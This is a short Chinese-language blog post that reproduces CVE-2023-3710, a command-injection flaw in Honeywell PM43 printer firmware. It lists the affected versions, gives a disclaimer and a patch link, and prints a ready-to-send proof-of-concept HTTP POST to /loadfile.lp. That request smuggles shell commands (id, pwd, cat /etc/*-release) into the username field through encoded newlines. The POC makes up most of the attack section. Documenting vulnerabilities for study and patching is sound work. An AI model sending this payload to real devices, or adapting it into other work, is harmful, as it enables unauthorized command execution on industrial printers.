Honeywell Products远程命令执行漏洞(CVE-2023-3710)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!
0x01漏洞介绍
Honeywell Products是美国霍尼韦尔(Honeywell)公司的一系列产品。
Honeywell PM43 P10.19.050004之前版本存在输入验证错误漏洞,该漏洞源于存在不正确的输入验证漏洞,允许命令注入。
0x02影响版本
Honeywell Pm43_Firmware < p10.19.050004
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC (POST)
漏洞复现
POST /loadfile.lp?pageid=Configure HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
pwd、id、 cat /etc/*-release 命令执行成功
3.nuclei工具测试(漏洞存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://hsmftp.honeywell.com/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果